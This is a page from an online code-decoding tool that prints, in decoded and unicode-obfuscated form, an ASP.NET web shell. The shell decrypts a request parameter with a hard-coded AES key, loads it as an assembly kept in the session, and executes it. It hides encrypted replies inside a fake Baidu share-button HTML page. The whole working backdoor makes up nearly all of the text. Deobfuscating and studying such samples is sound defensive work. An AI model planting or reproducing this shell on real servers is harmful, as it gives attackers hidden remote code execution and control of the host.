Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<%@ Page Language="C#"%><%try {string key = "3c6e0b8a9c15224a";string sign = "pass";string..

Decoded Output download

<?  <%@ Page Language="C#"%><%try {string key = "3c6e0b8a9c15224a";string sign = "pass";string md5 = @System/**/.@BitConverter.@ToString(new @System.@Security.@Cryptography.@MD5CryptoServiceProvider().@ComputeHash(@System.@Text.@Encoding.@Default.@GetBytes(sign + key))).@Replace("-", "").@ToLower();byte[] data/**/ = /**/@System.Convert/**/.FromBase64String/**/(/**/Context./**/Request[/**/sign]);data = (byte[])typeof(System.Security.Cryptography.RijndaelManaged).GetMethod("CreateDecryptor", new Type[] { typeof(byte[]), typeof(byte[]) }).Invoke(Activator.CreateInstance(typeof(System.Security.Cryptography.RijndaelManaged)),new object[] {System.Text.Encoding.Default.GetBytes(key),System.Text.Encoding.Default.GetBytes(key)}).GetType().GetMethod("TransformFinalBlock", new Type[] { typeof(byte[]), typeof(int), typeof(int) }).Invoke(typeof(System.Security.Cryptography.RijndaelManaged).GetMethod("CreateDecryptor", new Type[] { typeof(byte[]), typeof(byte[]) }).Invoke(Activator.CreateInstance(typeof(System.Security.Cryptography.RijndaelManaged)),new object[] {System.Text.Encoding.Default.GetBytes(key),System.Text.Encoding.Default.GetBytes(key)}),new object[] { data, 0, data.Length });if (Context.Session["loadekko"] == null) {var lllII1I = """".GetType()./**/Assembly;var I11ll1l = lllII1I.GetType("System.Reflection.Assembly");var ll1lIIl = I11ll1l.GetMethod("Load", new[] { typeof(byte[]) });Context.Session["loadekko"] = ll1lIIl.Invoke(lllII1I, new object[] { data });} else {var o0o0Oo0 = ((@System.@Reflection.@Assembly)Context.Session["loadekko"]).@CreateInstance("LY");var OO0OoO0 = new @System.@IO.@MemoryStream();o0o0Oo0.Equals(Context);o0o0Oo0.Equals(OO0OoO0);o0o0Oo0.Equals(data);o0o0Oo0.ToString();byte[] r = OO0OoO0.ToArray();string left = md5.Substring(0, 5);string replacedString = "var Rebdsek_config=".Replace("bdsek", left);Context.Response.ContentType = "text/html";Context.Response.Write("<!DOCTYPE html>");Context.Response.Write("<html lang=\"en\">");Context.Response.Write("<head>");Context.Response.Write("<meta charset=\"UTF-8\">");Context.Response.Write("<title>");Context.Response.Write("Breathtaking");Context.Response.Write("</title>");Context.Response.Write("</head>");Context.Response.Write("<body>");Context.Response.Write("<script>");Context.Response.Write("//<!-- Baidu Button BEGIN ");Context.Response.Write("<script type=\"text/javascript\" id=\"bdshare_js\" data="type=slide&amp;id=6537022");Context.Response.Write("" ></script>");Context.Response.Write("</body>");Context.Response.Write(replacedString);Context.Response.Write(System.Convert.ToBase64String(new System.Security.Cryptography.RijndaelManaged().CreateEncryptor(System.Text.Encoding.Default.GetBytes(key), System.Text.Encoding.Default.GetBytes(key)).TransformFinalBlock(r, 0, r.Length)));Context.Response.Write(";");Context.Response.Write("document.getElementById(\"bdshell_js\").src = \"http://bdimg.share.baidu.com/static/js/shell_v2.js?cdnversion=\" + Math.ceil(new Date()/6360000);");Context.Response.Write("</script>");Context.Response.Write("-->");Context.Response.Write("</script>");Context.Response.Write("</body>");Context.Response.Write("</html>");}} catch (System.Exception) { }%> ?>

Did this file decode correctly?

Original Code

<%@ Page Language="C#"%><%try {string key = "3c6e0b8a9c15224a";string sign = "pass";string md5 = @System/**/.@BitConverter.@ToString(new @System.@Security.@Cryptography.@MD5CryptoServiceProvider().@ComputeHash(@System.@Text.@Encoding.@Default.@GetBytes(sign + key))).@Replace("-", "").@ToLower();byte[] data/**/ = /**/@System.\u0043onvert/**/.\u0046romBase64String/**/(/**/Context./**/Request[/**/sign]);data = (byte[])typeof(System.\u0053ecurity.\u0043ryptography.\u0052ijndaelManaged).GetMethod("CreateDecryptor", new Type[] { typeof(byte[]), typeof(byte[]) }).Invoke(Activator.\u0043reateInstance(typeof(System.\u0053ecurity.\u0043ryptography.\u0052ijndaelManaged)),new object[] {System.\u0054ext.\u0045ncoding.\u0044efault.GetBytes(key),System.\u0054ext.\u0045ncoding.\u0044efault.GetBytes(key)}).GetType().GetMethod("TransformFinalBlock", new Type[] { typeof(byte[]), typeof(int), typeof(int) }).Invoke(typeof(System.\u0053ecurity.\u0043ryptography.\u0052ijndaelManaged).GetMethod("CreateDecryptor", new Type[] { typeof(byte[]), typeof(byte[]) }).Invoke(Activator.\u0043reateInstance(typeof(System.\u0053ecurity.\u0043ryptography.\u0052ijndaelManaged)),new object[] {System.\u0054ext.\u0045ncoding.\u0044efault.GetBytes(key),System.\u0054ext.\u0045ncoding.\u0044efault.GetBytes(key)}),new object[] { data, 0, data.Length });if (Context.Session["loadekko"] == null) {var lllII1I = "\u0022\u0022".GetType()./**/Assembly;var I11ll1l = lllII1I.GetType("\u0053\u0079\u0073\u0074\u0065\u006D.\u0052\u0065\u0066\u006C\u0065\u0063\u0074\u0069\u006F\u006E.\u0041\u0073\u0073\u0065\u006D\u0062\u006C\u0079");var ll1lIIl = I11ll1l.GetMethod("\u004C\u006F\u0061\u0064", new[] { typeof(byte[]) });Context.Session["loadekko"] = ll1lIIl.Invoke(lllII1I, new object[] { data });} else {var o0o0Oo0 = ((@System.@Reflection.@Assembly)Context.Session["loadekko"]).@CreateInstance("\u004C\u0059");var OO0OoO0 = new @System.@IO.@MemoryStream();o0o0Oo0.Equals(Context);o0o0Oo0.Equals(OO0OoO0);o0o0Oo0.Equals(data);o0o0Oo0.ToString();byte[] r = OO0OoO0.ToArray();string left = md5.Substring(0, 5);string replacedString = "var Rebdsek_config=".Replace("bdsek", left);Context.Response.ContentType = "text/html";Context.Response.Write("\u003C\u0021\u0044\u004F\u0043\u0054\u0059\u0050\u0045\u0020\u0068\u0074\u006D\u006C\u003E");Context.Response.Write("\u003C\u0068\u0074\u006D\u006C\u0020\u006C\u0061\u006E\u0067\u003D\"\u0065\u006E\"\u003E");Context.Response.Write("\u003C\u0068\u0065\u0061\u0064\u003E");Context.Response.Write("\u003C\u006D\u0065\u0074\u0061\u0020\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u003D\"\u0055\u0054\u0046\u002D\u0038\"\u003E");Context.Response.Write("\u003C\u0074\u0069\u0074\u006C\u0065\u003E");Context.Response.Write("\u0042\u0072\u0065\u0061\u0074\u0068\u0074\u0061\u006b\u0069\u006e\u0067");Context.Response.Write("\u003C\u002F\u0074\u0069\u0074\u006C\u0065\u003E");Context.Response.Write("\u003C\u002F\u0068\u0065\u0061\u0064\u003E");Context.Response.Write("\u003C\u0062\u006F\u0064\u0079\u003E");Context.Response.Write("\u003C\u0073\u0063\u0072\u0069\u0070\u0074\u003E");Context.Response.Write("\u002F\u002F\u003C\u0021\u002D\u002D\u0020\u0042\u0061\u0069\u0064\u0075\u0020\u0042\u0075\u0074\u0074\u006F\u006E\u0020\u0042\u0045\u0047\u0049\u004E\u0020");Context.Response.Write("\u003C\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u0074\u0079\u0070\u0065\u003D\"\u0074\u0065\u0078\u0074\u002F\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\"\u0020\u0069\u0064\u003D\"\u0062\u0064\u0073\u0068\u0061\u0072\u0065\u005F\u006A\u0073\"\u0020\u0064\u0061\u0074\u0061\u003D\u0022\u0074\u0079\u0070\u0065\u003D\u0073\u006C\u0069\u0064\u0065\u0026\u0061\u006D\u0070\u003B\u0069\u0064\u003D\u0036\u0035\u0033\u0037\u0030\u0032\u0032");Context.Response.Write("\u0022\u0020\u003E\u003C\u002F\u0073\u0063\u0072\u0069\u0070\u0074\u003E");Context.Response.Write("\u003C\u002F\u0062\u006F\u0064\u0079\u003E");Context.Response.Write(replacedString);Context.Response.Write(System.Convert.ToBase64String(new System.Security.Cryptography.RijndaelManaged().CreateEncryptor(System.Text.Encoding.Default.GetBytes(key), System.Text.Encoding.Default.GetBytes(key)).TransformFinalBlock(r, 0, r.Length)));Context.Response.Write(";");Context.Response.Write("\u0064\u006F\u0063\u0075\u006D\u0065\u006E\u0074\u002E\u0067\u0065\u0074\u0045\u006C\u0065\u006D\u0065\u006E\u0074\u0042\u0079\u0049\u0064\u0028\"\u0062\u0064\u0073\u0068\u0065\u006C\u006C\u005F\u006A\u0073\"\u0029\u002E\u0073\u0072\u0063\u0020\u003D\u0020\"\u0068\u0074\u0074\u0070\u003A\u002F\u002F\u0062\u0064\u0069\u006D\u0067\u002E\u0073\u0068\u0061\u0072\u0065\u002E\u0062\u0061\u0069\u0064\u0075\u002E\u0063\u006F\u006D\u002F\u0073\u0074\u0061\u0074\u0069\u0063\u002F\u006A\u0073\u002F\u0073\u0068\u0065\u006C\u006C\u005F\u0076\u0032\u002E\u006A\u0073\u003F\u0063\u0064\u006E\u0076\u0065\u0072\u0073\u0069\u006F\u006E\u003D\"\u0020\u002B\u0020\u004D\u0061\u0074\u0068\u002E\u0063\u0065\u0069\u006C\u0028\u006E\u0065\u0077\u0020\u0044\u0061\u0074\u0065\u0028\u0029\u002F\u0036\u0033\u0036\u0030\u0030\u0030\u0030\u0029\u003B");Context.Response.Write("\u003C\u002F\u0073\u0063\u0072\u0069\u0070\u0074\u003E");Context.Response.Write("\u002D\u002D\u003E");Context.Response.Write("\u003C\u002F\u0073\u0063\u0072\u0069\u0070\u0074\u003E");Context.Response.Write("\u003C\u002F\u0062\u006F\u0064\u0079\u003E");Context.Response.Write("\u003C\u002F\u0068\u0074\u006D\u006C\u003E");}} catch (System.Exception) { }%>

Function Calls

None

Variables

None

Stats

MD5 cb584c5097cbcc62eb90979624b3b7fa
Eval Count 0
Decode Time 53 ms